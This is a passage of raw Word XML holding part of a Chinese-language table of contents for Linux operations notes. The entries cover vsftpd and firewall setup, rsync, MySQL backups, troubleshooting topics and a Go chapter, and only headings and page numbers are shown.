                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779727 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>207</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B32DAC2" w14:textId="77911229" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779728" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>配置</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779728 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>207</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08FF11BB" w14:textId="751881AC" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779729" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>配置防火墙</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779729 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>208</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C57F0D3" w14:textId="2EB21777" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779730" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>创建</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779730 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>209</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14BEA9D8" w14:textId="2408EDA0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779731" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>rsync</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779731 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>210</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7186791D" w14:textId="7EE19B22" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779732" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>常见参数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779732 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>210</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EE14FD6" w14:textId="5275AEC7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779733" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>rsync</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>同步目录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779733 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>211</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34C099C9" w14:textId="71A266B4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779734" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>rsync</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>清空目录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779734 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>211</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BD89414" w14:textId="35B545DC" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779735" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>每</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>个小时备份</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>数据库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779735 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>212</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EB597DD" w14:textId="3ACEF6A3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779736" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>运维问题积累</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779736 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>212</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="378FAF89" w14:textId="61EE842D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779737" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>开机启动</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1m30s</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>慢</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779737 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>212</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E4DE1BB" w14:textId="0B4E6064" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779738" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>fsck</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：强行重启系统导致分区出现问题</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779738 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>213</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CD976EF" w14:textId="53F3E2F0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779739" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>apt-get --fix-broken</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>给出错误</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779739 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>215</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DB48AEA" w14:textId="766C3BBD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779740" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>修改</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>python</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>软连接，使得</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>py2</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>也可以叫</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>python</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779740 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>216</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0241EF8E" w14:textId="17B68038" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779741" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gitlab-ee</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的破解版返回</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>500</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>501</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>响应</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779741 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>216</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="368FC512" w14:textId="5ACC5CF6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779742" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Go</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779742 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>217</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44881D01" w14:textId="62D9A656" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
